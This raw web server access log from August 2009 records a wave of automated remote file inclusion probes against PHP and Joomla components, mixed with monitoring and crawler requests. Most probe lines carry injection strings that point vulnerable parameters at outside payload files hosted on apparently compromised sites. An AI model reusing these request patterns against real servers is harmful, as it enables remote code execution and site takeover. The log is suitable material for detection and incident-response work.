87.118.117.124 - - [05/Aug/2009:05:40:12 -0400] "GET /logs/access_log.Q109063000%20%20/errors.php?error=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.118.117.124 - - [05/Aug/2009:05:40:22 -0400] "GET /logs/access_log.Q109071100%20%20//common/db.php?commonpath=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
79.32.190.247 - - [05/Aug/2009:05:40:44 -0400] "GET //common/db.php?commonpath=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
79.32.190.247 - - [05/Aug/2009:05:40:44 -0400] "GET /logs//common/db.php?commonpath=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
79.32.190.247 - - [05/Aug/2009:05:40:58 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Aug/2009:05:41:06 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/rebon121/dinda.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
200.93.147.154 - - [05/Aug/2009:05:41:06 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/rebon121/dinda.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
200.93.147.154 - - [05/Aug/2009:05:41:06 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/rebon121/dinda.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
200.93.147.154 - - [05/Aug/2009:05:41:14 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.93.147.154 - - [05/Aug/2009:05:41:14 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
200.93.147.154 - - [05/Aug/2009:05:41:14 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
200.93.147.154 - - [05/Aug/2009:05:41:16 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.142.209.134 - - [05/Aug/2009:05:42:24 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:05:43:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.116.209 - - [05/Aug/2009:05:44:41 -0400] "GET /errors.php?error=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.116.209 - - [05/Aug/2009:05:44:41 -0400] "GET /logs/errors.php?error=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.116.209 - - [05/Aug/2009:05:44:41 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.58.179.136 - - [05/Aug/2009:05:44:51 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
207.58.179.136 - - [05/Aug/2009:05:44:51 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.825"
207.58.179.136 - - [05/Aug/2009:05:44:51 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.825"
74.53.201.178 - - [05/Aug/2009:05:44:58 -0400] "GET /logs/access_log.Q109070400//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:05:44:58 -0400] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:05:44:58 -0400] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
207.58.179.136 - - [05/Aug/2009:05:45:09 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
121.78.116.209 - - [05/Aug/2009:05:45:15 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.58.179.136 - - [05/Aug/2009:05:45:50 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.825"
72.30.81.182 - - [05/Aug/2009:05:47:30 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.201.178 - - [05/Aug/2009:05:47:40 -0400] "GET /logs/access_log.Q109070400%20%20//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
72.30.81.182 - - [05/Aug/2009:05:47:31 -0400] "GET /logs/access_log.Q109052300 HTTP/1.0" 200 2758218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [05/Aug/2009:05:48:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.110.74.195 - - [05/Aug/2009:05:49:11 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
117.110.74.195 - - [05/Aug/2009:05:49:12 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
117.110.74.195 - - [05/Aug/2009:05:49:12 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
117.110.74.195 - - [05/Aug/2009:05:49:36 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
117.110.74.195 - - [05/Aug/2009:05:50:46 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
62.140.23.185 - - [05/Aug/2009:05:51:32 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.140.23.185 - - [05/Aug/2009:05:51:32 -0400] "GET /appserv/main.php?appserv_root=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
62.140.23.185 - - [05/Aug/2009:05:51:32 -0400] "GET /logs/appserv/main.php?appserv_root=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
87.118.117.124 - - [05/Aug/2009:05:51:59 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
87.118.117.124 - - [05/Aug/2009:05:51:59 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.118.117.124 - - [05/Aug/2009:05:51:59 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
62.140.23.185 - - [05/Aug/2009:05:53:18 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:05:53:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.88.84 - - [05/Aug/2009:05:53:52 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:05:53:53 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:05:53:53 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
94.23.205.32 - - [05/Aug/2009:05:54:49 -0400] "GET //?option=com_joomap&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:05:54:49 -0400] "GET /logs/access_log.Q109070300//?option=com_joomap&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:05:54:49 -0400] "GET /logs//?option=com_joomap&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:05:54:56 -0400] "GET /logs/access_log.Q109070900//?option=com_joomap&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
89.108.88.84 - - [05/Aug/2009:05:54:59 -0400] "GET /logs/access_log.Q109062400/includes/ktedit/toolbar.php?dirDepth=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
87.118.117.124 - - [05/Aug/2009:05:56:46 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.108.88.84 - - [05/Aug/2009:05:57:18 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
74.70.240.188 - - [05/Aug/2009:05:57:40 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.23.205.32 - - [05/Aug/2009:05:58:27 -0400] "GET /logs/access_log.Q109072900%20//?option=com_joomap&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:05:58:27 -0400] "GET /logs/access_log.Q109061100%20//?option=com_joomap&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
209.59.12.99 - - [05/Aug/2009:05:58:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.88.84 - - [05/Aug/2009:05:58:44 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
211.189.39.159 - - [05/Aug/2009:06:01:52 -0400] "GET /logs/access_log.Q109053000//include/write.php?dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.189.39.159 - - [05/Aug/2009:06:01:52 -0400] "GET //include/write.php?dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.189.39.159 - - [05/Aug/2009:06:01:52 -0400] "GET /logs//include/write.php?dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.189.39.159 - - [05/Aug/2009:06:02:13 -0400] "GET /logs/access_log.Q109061100//include/write.php?dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:06:03:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.93.147.154 - - [05/Aug/2009:06:03:44 -0400] "GET /logs/error_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/rebon121/dinda.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
79.171.18.196 - - [05/Aug/2009:06:04:52 -0400] "GET //songinfo.php?commonpath=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
79.171.18.196 - - [05/Aug/2009:06:04:52 -0400] "GET /logs//songinfo.php?commonpath=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
79.171.18.196 - - [05/Aug/2009:06:05:26 -0400] "GET /logs/access_log.Q109071100%20%20//songinfo.php?commonpath=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
94.23.205.32 - - [05/Aug/2009:06:05:39 -0400] "GET /logs/access_log.Q109061100//?option=com_mkpostman&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:05:39 -0400] "GET //?option=com_mkpostman&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:05:39 -0400] "GET /logs//?option=com_mkpostman&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:05:55 -0400] "GET //?option=com_mkpostman&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:05:55 -0400] "GET /logs/access_log.Q109061100//?option=com_mkpostman&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:05:56 -0400] "GET /logs//?option=com_mkpostman&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
200.93.147.154 - - [05/Aug/2009:06:08:29 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
200.93.147.154 - - [05/Aug/2009:06:08:29 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
200.93.147.154 - - [05/Aug/2009:06:08:30 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [05/Aug/2009:06:08:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.32.190.247 - - [05/Aug/2009:06:09:03 -0400] "GET /logs/access_log.Q109071100%20%20//common/db.php?commonpath=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
61.250.92.173 - - [05/Aug/2009:06:12:05 -0400] "GET /logs/access_log.Q109062400%20///lib/common.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
61.250.92.173 - - [05/Aug/2009:06:12:05 -0400] "GET /logs///lib/common.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
61.250.92.173 - - [05/Aug/2009:06:12:05 -0400] "GET ///lib/common.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
91.121.89.135 - - [05/Aug/2009:06:12:21 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:06:12:21 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:06:12:21 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:06:13:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.132 - - [05/Aug/2009:06:13:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
91.121.89.135 - - [05/Aug/2009:06:14:51 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
79.171.18.196 - - [05/Aug/2009:06:14:54 -0400] "GET /logs/access_log.Q109071100//songinfo.php?commonpath=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:06:15:27 -0400] "GET /logs/access_log.Q109071400%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
207.58.179.136 - - [05/Aug/2009:06:16:28 -0400] "GET /logs/access_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
207.58.179.136 - - [05/Aug/2009:06:16:29 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 220 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
207.58.179.136 - - [05/Aug/2009:06:16:37 -0400] "GET /logs/access_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.825"
207.58.179.136 - - [05/Aug/2009:06:16:37 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.825"
207.58.179.136 - - [05/Aug/2009:06:16:37 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.825"
117.110.74.195 - - [05/Aug/2009:06:16:44 -0400] "GET /logs/access_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
117.110.74.195 - - [05/Aug/2009:06:16:44 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 220 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
123.125.66.126 - - [05/Aug/2009:06:16:47 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.58.179.136 - - [05/Aug/2009:06:16:49 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 246 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
117.110.74.195 - - [05/Aug/2009:06:17:01 -0400] "GET /logs/access_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
117.110.74.195 - - [05/Aug/2009:06:17:02 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
117.110.74.195 - - [05/Aug/2009:06:17:02 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
207.58.179.136 - - [05/Aug/2009:06:17:04 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.825"
117.110.74.195 - - [05/Aug/2009:06:17:13 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 246 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
79.32.190.247 - - [05/Aug/2009:06:17:33 -0400] "GET //modules/xfsection/modify.php?dir_module=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
79.32.190.247 - - [05/Aug/2009:06:17:33 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
117.110.74.195 - - [05/Aug/2009:06:17:41 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
79.32.190.247 - - [05/Aug/2009:06:17:41 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
207.58.179.136 - - [05/Aug/2009:06:18:13 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.825"
209.59.12.99 - - [05/Aug/2009:06:18:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.55.179.121 - - [05/Aug/2009:06:20:08 -0400] "GET /logs/access_log.Q109063000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.55.179.121 - - [05/Aug/2009:06:20:08 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.55.179.121 - - [05/Aug/2009:06:20:08 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
60.251.217.4 - - [05/Aug/2009:06:20:29 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
60.251.217.4 - - [05/Aug/2009:06:20:35 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
193.34.16.183 - - [05/Aug/2009:06:21:13 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
193.34.16.183 - - [05/Aug/2009:06:21:13 -0400] "GET /logs/access_log.Q109063000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
193.34.16.183 - - [05/Aug/2009:06:21:13 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
160.78.182.81 - - [05/Aug/2009:06:21:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
160.78.182.81 - - [05/Aug/2009:06:21:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
117.110.74.195 - - [05/Aug/2009:06:21:37 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
72.55.179.121 - - [05/Aug/2009:06:21:57 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:06:22:51 -0400] "GET /logs/errors.php?error=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:06:22:51 -0400] "GET /errors.php?error=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:06:22:51 -0400] "GET /logs/access_log.Q109060800%20%20/errors.php?error=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:06:23:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.34.16.183 - - [05/Aug/2009:06:24:07 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:06:25:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
